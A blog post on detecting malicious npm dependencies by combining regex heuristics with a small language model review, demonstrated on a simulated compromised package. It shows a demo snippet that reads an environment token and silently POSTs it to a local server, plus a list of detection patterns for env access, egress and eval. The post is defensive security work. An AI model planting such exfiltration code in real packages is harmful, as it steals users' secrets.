Detecting Malicious Dependencies with Behavioral + SLM Scans

- Author: Parminder Singh

Earlier this month, attackers compromised the account of a popular npm maintainer through a phishing attack, then published malicious versions of 18 widely used packages (including debug) that together have over 2 billion weekly downloads. These versions injected browser-side malware that intercepted cryptocurrency transactions and replaced wallet addresses with visually similar attacker-controlled ones to evade detection. No CVE had been assigned at the time, so regular software composition analysis (SCA) scanners, which rely on published CVEs, could not detect the attack. In this post, I explore an alternative approach: scanning dependencies for behavioral patterns with heuristics and having a small language model (SLM) review the findings.

Photo by Jefferson Santos on Unsplash

I will walk through a simple demo to illustrate the idea. You can clone the repo and run the scans yourself. (Some of the demo code was generated with the help of Cursor and adapted for this example.)

Demo malicious code and SAST scan

The repo simulates a regular Node.js app. The app folder contains the application code, and the packages folder contains the dependencies it might have. In the real world, these would come directly from the npm registry, but for the demo I put the malicious code in a local package.

The malicious code is in packages/kleurx/index.js. It simply simulates the attack with a call to a local server.

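const http = require('http') // needed for http.request below

// Read a secret from the environment and keep its first 8 characters
const leak = (process.env.DEMO_TOKEN || '').slice(0, 8)

try {
  // POST the value to a local server (stands in for an attacker endpoint)
  const req = http.request(
    { hostname: '127.0.0.1', port: 8080, path: '/', method: 'POST' },
    (res) => {
      res.resume() // discard the response body
    }
  )
  req.on('error', () => {}) // swallow errors so nothing surfaces in the host app
  req.end(JSON.stringify({ leak, ts: Date.now() }))
} catch (e) {}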



In the code above, we read an environment variable and send it in a network request to a local server, simulating a classic exfiltration pattern. Neither operation is suspicious on its own, so Semgrep and other SAST tools running general-purpose rule sets are unlikely to flag it. Yes, we could craft custom Semgrep rules for this example, but attackers evolve quickly, and a rules-only approach turns into a constant catch-up exercise.
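To make the point about individually harmless operations concrete, here is a minimal Python sketch that treats environment access and network egress as a signal only when they appear together in one file. The two regular expressions and the function name are assumptions made for illustration, not rules taken from the repo or from Semgrep.

```python
import re

# Illustrative patterns (assumptions for this sketch, not the repo's rules).
ENV_ACCESS = re.compile(r"\bprocess\.env\b")
NET_EGRESS = re.compile(r"\bhttps?\.(request|get)\b|\bnet\.connect\b")


def looks_like_exfiltration(source: str) -> bool:
    """Return True only when env access and network egress co-occur."""
    return bool(ENV_ACCESS.search(source)) and bool(NET_EGRESS.search(source))


# Each benign sample contains just one of the two behaviors.
benign_config = "const port = process.env.PORT || 3000"
benign_client = "http.get('http://example.com', (res) => res.resume())"
# The suspicious sample reads a secret and sends it over the network.
suspicious = (
    "const leak = process.env.DEMO_TOKEN;"
    "http.request({ hostname: '127.0.0.1' }).end(leak)"
)

for sample in (benign_config, benign_client, suspicious):
    print(looks_like_exfiltration(sample))
```

A co-occurrence check like this is still a fixed rule and is easy to evade with light obfuscation, which is why a model review on top of the heuristics is worth exploring.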

By default, SAST tools typically do not scan code in dependencies (node_modules, etc.). For this demo, force the scan to run (from the app directory):

semgrep --config p/javascript --config ./semgrep_org.yml node_modules/kleurx/index.js

The additional Semgrep rules are in the semgrep_org.yml file.

Output from my machine is shown below.

Demo behavioral scan

For the behavioral scan, look at the code in behavior_scan.py. At a high level, it:

- defines malicious patterns,

- scans the code for these patterns, and

- asks the SLM to review the matches and return a report that rates the risk and lists the issues.

Snippets of the high-level logic are shown below. The full code is in the repo.

import os
import re
import textwrap

# Heuristic patterns
PATTERNS = {
    "env_access": r"\bprocess\.env\b",
    "http_egress": r"\bhttp\.(request|get)\b|\bhttps\.(request|get)\b|\bnet\.connect\b",
    "base64_decode": r"Buffer\.from\s*\([^)]*,\s*['\"]base64['\"]\s*\)",
    "child_process": r"\bchild_process\b",
    "new_function": r"new\s+Function\s*\(",
    "eval": r"\beval\s*\("
}

#################
# Collect these from code
# (files, signals, read_text and ROOT are defined in the full script)
for fp in files:
    txt = read_text(fp)
    if not txt:
        continue
    hits = []
    for name, pat in PATTERNS.items():
        if re.search(pat, txt):
            hits.append(name)
    if hits:
        signals.append({
            "file": os.path.relpath(fp, ROOT),
            "hits": sorted(set(hits)),
            "snippet": txt[:1200]  # keep prompt small
        })

#################
# Code to call the SLM
# (model, base_url and snippet come from the surrounding code in the repo)
model = model or os.environ.get("SLM_MODEL", "llama3.2:3b")
base = (base_url or os.environ.get("OLLAMA_BASE_URL", "http://localhost:11434")).rstrip("/")
url = f"{base}/api/chat"

prompt = textwrap.dedent(f"""
    You are a security code reviewer for supply-chain risks.
    Analyze the dependency snippet BELOW and return ONLY strict JSON:
    {{
      "risk": "low|medium|high",
      "issues": ["short issue 1", "short issue 2"],
      "explanation": "2-4 sentences, one paragraph"
    }}
    Consider behaviors like:
    - environment variable access
    - network egress (HTTP/HTTPS/net) on import
    - use of obfuscation (base64) or dynamic code (eval/new Function)
    - child process usage
    Code:
    ---
    {snippet}
    ---
""").strip()

payload = {
    "model": model,
    "stream": False,
    "options": {"temperature": 0, "num_ctx": 4096},
    "messages": [{"role": "user", "content": prompt}],
    "format": "json"
}

#################
# Remaining code


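The snippets above rely on a list of files and a read_text helper that live in the repo and are not shown here. As a rough stand-in, and not the repo's actual implementation, they could look like the sketch below. The names collect_js_files, JS_EXTENSIONS and MAX_BYTES, and the size limit itself, are hypothetical choices made for illustration.

```python
import os

# Hypothetical settings for this sketch.
JS_EXTENSIONS = (".js", ".cjs", ".mjs")
MAX_BYTES = 200_000  # skip very large files; arbitrary limit


def collect_js_files(root: str) -> list[str]:
    """Walk root (for example node_modules) and return JavaScript file paths."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if name.endswith(JS_EXTENSIONS):
                found.append(os.path.join(dirpath, name))
    return sorted(found)


def read_text(path: str) -> str:
    """Return the file contents, or "" if the file is unreadable or too large."""
    try:
        if os.path.getsize(path) > MAX_BYTES:
            return ""
        with open(path, "r", encoding="utf-8", errors="ignore") as fh:
            return fh.read()
    except OSError:
        return ""
```

Returning an empty string for unreadable files matches the `if not txt: continue` check in the collection loop, so such files are simply skipped. Skipping large files keeps the scan fast but also leaves a blind spot, so the limit deserves some thought in a real setup.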

For the demo I'm using llama3.2:3b running locally in Ollama.

Output from my machine is shown below.

The SLM identified the malicious code and rated the risk as high. Its explanation: "This code has high-risk behavior due to its use of environment variable access and network egress on import. The leak function is designed to collect telemetry data without proper validation or sanitization, making it a potential security risk. Additionally, the code makes a network request to a hardcoded IP address and port, which could be used to exfiltrate sensitive data."
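Small models do not always return well-formed JSON, so it helps to validate the report before acting on it. The sketch below assumes the non-streaming Ollama /api/chat response carries the model's text under message.content, and it checks the three fields requested in the prompt. The function name parse_report and the choice to fall back to a "high" verdict on unparseable output are my assumptions, not necessarily what the repo does.

```python
import json

ALLOWED_RISKS = {"low", "medium", "high"}


def parse_report(ollama_response: dict) -> dict:
    """Validate the model's JSON report; fail closed when it is unusable."""
    # Assumption: treat anything we cannot parse as needing human review.
    fallback = {
        "risk": "high",
        "issues": ["unparseable model output"],
        "explanation": "",
    }
    message = ollama_response.get("message")
    content = message.get("content", "") if isinstance(message, dict) else ""
    try:
        report = json.loads(content)
    except (TypeError, json.JSONDecodeError):
        return fallback
    if not isinstance(report, dict):
        return fallback
    risk = str(report.get("risk", "")).strip().lower()
    if risk not in ALLOWED_RISKS:
        return fallback
    issues = report.get("issues", [])
    if not isinstance(issues, list):
        issues = [issues]
    return {
        "risk": risk,
        "issues": [str(issue) for issue in issues],
        "explanation": str(report.get("explanation", "")),
    }
```

Failing closed means a garbled answer blocks the change until someone looks at it. Failing open would be less noisy, but it would let a confused model wave a package through.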

In the real world, we could fine-tune an SLM on malicious patterns for specific languages, org-specific code rules, known bugs, and so on, rather than rely on generic patterns (which could just as well be added to a SAST rules engine).

This can be plugged into an existing CI/CD pipeline and run on every merge request that introduces a new dependency or upgrades an existing one. SCA and SAST remain essential, but augmenting them with behavioral + SLM checks helps close the gap on supply chain attacks that won't show up in CVE-based scanners. Also, because the model is small, running it in a pipeline is relatively easy and doesn't require much infrastructure. I ran these scans on my machine on an Intel CPU.
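As a sketch of what the pipeline hook might look like, the code below compares two package.json manifests to find added or changed dependencies, then turns per-package reports into an exit code. The function names, the report shape, and the version numbers are hypothetical. Comparing declared ranges in package.json is a simplification, since a real check would more likely diff the lockfile's resolved versions.

```python
import json


def changed_dependencies(old_manifest: dict, new_manifest: dict) -> dict:
    """Map package name -> (old_version, new_version) for added or changed deps."""
    changes = {}
    for section in ("dependencies", "devDependencies"):
        old = old_manifest.get(section, {})
        new = new_manifest.get(section, {})
        for name, version in new.items():
            if old.get(name) != version:
                changes[name] = (old.get(name), version)
    return changes


def gate(reports: dict) -> int:
    """Return a process exit code: 1 if any scanned package was rated high."""
    return 1 if any(r.get("risk") == "high" for r in reports.values()) else 0


# Illustrative manifests; the version numbers are made up.
old = json.loads('{"dependencies": {"debug": "1.0.0"}}')
new = json.loads('{"dependencies": {"debug": "1.1.0", "kleurx": "0.1.0"}}')

to_scan = changed_dependencies(old, new)
print(to_scan)  # packages that the behavioral + SLM scan should look at

# Hypothetical reports keyed by package name, as a scan step might produce.
reports = {"debug": {"risk": "low"}, "kleurx": {"risk": "high"}}
print(gate(reports))
```

A CI job could pass the result of gate to sys.exit so that a high-risk verdict fails the merge request and prompts a manual review.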

Let me know your thoughts.